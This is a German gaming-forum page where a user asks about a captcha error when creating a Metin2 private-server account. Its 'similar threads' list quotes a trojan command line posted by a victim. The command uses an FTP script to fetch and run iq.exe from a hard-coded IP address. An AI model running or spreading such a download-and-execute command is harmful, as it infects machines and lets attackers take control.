Register for your free account! | Forgot your password?

You last visited: Today at 22:15

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Merkwürdiger Fehler

Discussion on Merkwürdiger Fehler within the Metin2 Private Server forum part of the Metin2 category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Aug 2009
Posts: 93
Received Thanks: 5
Merkwürdiger Fehler

Hallo ich habe ein Problem ich kann mir keinen zuiaipk acc erstellen es kommt immer ein Fehler.
Kann mir Bitte Jemand einen ertstellen Danke .
KillaGangstar is offline  
Old 08/08/2009, 12:07   #2
 
Moonlight x3's Avatar
 
elite*gold: 20
Join Date: Aug 2008
Posts: 1,734
Received Thanks: 1,961
Das heißt, dass deine Captcha falsch war.
und nochwas: Bitte zensiere den Link oben aus der Adressenleiste - da dies sonst als "Umgehung der Zensierung" gilt.

Schluss: Verboten ist. :-)
Moonlight x3 is offline  
Old 08/08/2009, 12:10   #3
 
elite*gold: 0
Join Date: Aug 2009
Posts: 93
Received Thanks: 5
Wie zensir ich das?
KillaGangstar is offline  
Reply


Similar Threads Similar Threads
*fehler* mc.exe - kein Datenträger *fehler*
10/16/2010 - Metin2 Private Server - 11 Replies
hii com. seid. 2 stunden taucht bei mir immer wieder dieser fehler: mc.exe - kein Datenträger. Es befindet sich kein Datenträger im Laufwerk. Legen Sie einen Datenträger in Laufwerk \Device\Harddisk\DR1 ein. wann kommt der fehler ?!
[Hilfe]DB fehler und char fehler
07/25/2010 - Metin2 Private Server - 3 Replies
hallo ich habe die SF von bjoern.ebert17 folgende fehler : 1 ich kann keinen account erstellen bei Player wenn ich AccountID eingeben will kann ich das nicht kann nur zahlen eingeben wie kann ich einen account erstellen? 2 auf dem account von bjoern.ebert17 kann ich keinen char erstellen zb ich will einen char machen namens hallo = Du kannst diesen Charakter nicht erstellen oder so was kann ich dagegen tun ( egal ob ich Test oder so nehme kein name tut) Bitte um schnelle hilfe
ymyt2 :) Merkwürdiger Fehler
12/01/2009 - Metin2 Private Server - 5 Replies
Hey leute, Ich hab mir ma zum Spaß die exe von ymyt2 runtergeladen, und alles richtig eingefügt etc. Nun, als ich draufklicken wollte kam ein fehler "Can't Open File" Dachte ich mir, "okay, lädste halt den kompletten Ordner runter, gesagt getan.. Klick auf die exe -> Can't open File Naja hab gehört, dass schon mehrere Leute das problem hatten.
merkwürdiger trojaner
01/01/2008 - Technical Support - 2 Replies
hm. hab nen merkwürdigen trojaner aufm comp. macht taskmanager auf will cmd starten und das schreiben: cm/c net stopSharedAccess &echo open 87.123.239.115 44752 >> ij &echo user d3m0n3 d4rk3v1l >> ij &echo get iq.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &iq.exe &net start SharedAccess &exit hat jemand ne idee was er machen will. und wer is dieser demone darkevil? btw soll ich gleich noch hihjackthis posten?
glider merkwürdiger error
10/25/2006 - World of Warcraft - 6 Replies
es kommt ein error das es zuviele benutzen oder so mom ich post ma! unable to retieve offsets from wowglider server, status =failed too many gliders logged in on this key. stop instances of glider first before starting another one open link ti more information on this error? dann wenn ich ka drücke öffnet sich das forum von www.wowglider.com



All times are GMT +2. The time now is 22:15.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.